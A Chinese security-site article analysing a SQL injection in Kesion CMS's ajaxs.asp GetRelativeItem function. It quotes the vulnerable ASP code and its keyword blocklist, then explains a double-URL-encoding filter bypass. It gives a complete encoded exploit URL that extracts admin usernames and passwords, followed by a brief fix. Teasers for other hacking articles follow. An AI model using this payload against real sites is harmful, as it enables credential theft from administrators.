什么导致kesion cms注入漏洞?有什么修复方案?
Kesion cms注入漏洞.我们来分析一下:函数过滤混乱导致注入
复制代码
代码如下:
Dim KS:Set KS=New PublicCls
Dim Action
Action=KS.S("Action")
Select Case Action
Case "Ctoe" CtoE
Case "GetTags" GetTags
Case "GetRelativeItem" GetRelativeItem //问题函数
...skip...
Case "getonlinelist" getonlinelist
End Select
Sub GetRelativeItem() //漏洞函数开始
Dim Key:Key=UnEscape(KS.S("Key"))//漏洞位置,只调用ks.s函数,无其它过滤。
Dim Rtitle:rtitle=lcase(KS.G("rtitle"))
Dim RKey:Rkey=lcase(KS.G("Rkey"))
Dim ChannelID:ChannelID=KS.ChkClng(KS.S("Channelid"))
Dim ID:ID=KS.ChkClng(KS.G("ID"))
Dim Param,RS,SQL,k,SqlStr
If Key<>"" Then
If (Rtitle="true" Or RKey="true") Then
If Rtitle="true" Then
param=Param & " title like '%" & key & "%'"//类似搜索型注入漏洞。
end if
If Rkey="true" Then
If Param="" Then
Param=Param & " keywords like '%" & key & "%'"
Else
Param=Param & " or keywords like '%" & key & "%'"
End If
End If
Else
Param=Param & " keywords like '%" & key & "%'"
End If
End If
If Param<>"" Then
Param=" where InfoID<>" & id & " and (" & param & ")"
else
Param=" where InfoID<>" & id
end if
If ChannelID<>0 Then Param=Param & " and ChannelID=" & ChannelID
Param=Param & " and verific=1"
SqlStr="Select top 30 ChannelID,InfoID,Title From KS_ItemInfo " & Param & " order by id desc" //查询
Set RS=Server.CreateObject("ADODB.RECORDSET")
RS.Open SqlStr,conn,1,1
If Not RS.Eof Then
SQL=RS.GetRows(-1)
End If
RS.Close
先进行了过滤,然后才调用UnEscape解码,
复制代码
代码如下:
Public Function S(Str)
S = DelSql(Replace(Replace(Request(Str), "'", ""), """", ""))
Function DelSql(Str)
Dim SplitSqlStr,SplitSqlArr,I
SplitSqlStr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell"
SplitSqlArr = Split(SplitSqlStr,"|")
For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr)
If Instr(LCase(Str),SplitSqlArr(I))>0 Then
Die "
"
End if
Next
DelSql = Str
End Function
如果配合Unescape()函数,刚过滤不会生效。可以采用unicode编码方式,则不会在浏览器中出现被过滤的字符。例如,单引号可以编码为。%2527,经过解码后还是“'”号,这样的话,就可以利用类似php的二次编码漏洞的方式绕过过滤了。
注入语句:%') union select 1,2,username+'|'+ password from KS_Admin
转换如下:
/plus/ajaxs.asp?action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
修复方案:
UnEscape()函数调用位置放在函数体内,或者不调用。
破解密码有哪些高招?怎么加密才有保障?
加密和解密是一个永久的热点话题,什么样的加密才是安全的?怎样才能解开常用的密码?你是否已经意识到,在你每日朝夕相处的密码和保护中,已经有太多的不安全因素在困扰着自己?今天,笔者将带领大家一起走近破
详情2018-02-03 14:25:03责编:llp 来源:驱动管家挖掘鸡配置 挖掘鸡入侵传奇sf图解
图一 选择扫描的URL连接,点了了URL,能下载说明存在数据库,不能下载说明不存在数据库。如图2,说明
详情2018-01-25 10:55:55责编:llp 来源:驱动管家黑客技术入门 网络密码十大破解方法
个人网络密码安全是整个网络安全的一个重要环节,如果个人密码遭到黑客破解,将引起非常严重的后果,例如网络银行的存款被转账盗用,网络游戏内的装备或者财产被盗,QQ币被盗用等等,增强网民的网络安全意识是网
详情2018-01-03 09:05:38责编:llp 来源:驱动管家什么是windows defender?windows defender程序的分析破解
Defender与底层操作系统紧密集成在一起,且它是专为在基于NT的Windows系统中运行设计的。它可以在当前所有基于NT的系统中运行,包括Windows XP、Windows Server 2003、Windows 2000和Windows NT 4 0,但不
详情2018-01-18 14:12:32责编:llp 来源:驱动管家网络安全密钥 怎么获取密钥生成算法?
从拷贝保护产品中剥取(ripping)算法通常是创建密钥生成程序的一种简单而行之有效的方法。其思路非常简单:定位受保护程序内计算合法序列号的函数(可能不止一个函数),并将它(们)移植到你密钥生成程序中。这
详情2018-01-13 17:21:44责编:llp 来源:驱动管家soliddb数据库的描述 soliddb数据库的漏洞
受影响系统:IBM solidDB
详情2018-01-25 16:13:41责编:llp 来源:驱动管家serv-u ftp越狱 如何防范serv-u ftp越狱?
防范serv-u ftp越狱的代码如下:[*]----------------------------------------------------[*]Serv-U FTP Server Jail Break 0dayDiscovered By KingcopeYear 2011[*]----------------------------------
详情2018-01-24 14:19:56责编:llp 来源:驱动管家wannacry勒索病毒劫持计算机怎么办?这款wannaCry文件恢复工具能帮你
从5月12日爆发至今,名为WannaCry的勒索病毒让全球数十万Windows计算机中招,黑客将用户计算机中的重要文件实施加密,并索要赎金解锁。这种情况如果发生在企业服务器当中,那么将带来严重损失。对此,阿里云安全
详情2018-01-16 14:25:09责编:llp 来源:驱动管家玩传世游戏时木马盗号 木马盗号怎么预防?
玩传世已经有一段时间了,以前对木马盗号之类的事情总是听的很多,但是从来没有碰到过,自从玩了传世开始,让小弟我着实领教了一次什么叫木马盗号,那个厉害阿。以至于现在上网都怕怕,怕中招。好废话不说,来分析一下木
详情2018-01-10 17:54:09责编:llp 来源:驱动管家跨站脚本攻击和跨站请求伪造的解决思路
跨站脚本攻击(XSS,Cross-site scripting)是最常见和基本的攻击Web网站的方法。攻击者可以在网页上发布包含攻击性代码的数据,当浏览者看到此网页时,特定的脚本就会以浏览者用户的身份和权限来执行。通过XSS
详情2018-02-26 09:43:20责编:llp 来源:驱动管家
- 怎么在Ubuntu系统中安装Nvidia显卡驱动
- 怎么在wps上将文字设置为首字下沉的效果
- 这些关于安装软件的这些方法技巧你一定要知道
- 购买电脑显示器的时候一定要学会测试这些东西
- 白菜价有毛用 电视为何不能当显示器用
- OPPO R15曝光 可实时完成全屏多任务操作
- Windows 10 S将集成到其他Windows版本中 独立版本被砍
- 电脑最近打开的文档记录怎么隐藏?隐藏文档记录的方法
- Win10怎么自定义设置文件资源管理器打开位置?
- blackberry手机如何将通信录导入安卓手机?
- thl糖葫芦 otg功能 thl糖葫芦如何连接u盘?
- 电脑怎么建立不可删除的autorun.inf免疫文件?autorun.inf文件建立方法
- 如何在文字上方加拼音 wps在文字上加拼音教程
- Metasploit有哪些渗透命令?这些渗透命令的作用
- DirectShow漏洞的危害 什么是DirectShow?
- Win7系统安装显卡驱动后电脑一直重启的原因和解决方法
- 人人桌面是什么?注册人人网的账号的相关方法详解
- blender模型网格混乱怎么办?教你这样重构网格
- 什么是硬盘的转速?硬盘转速有哪些作用
- 使用机械键盘的时候为什么会出现卡顿的现象?怎么解决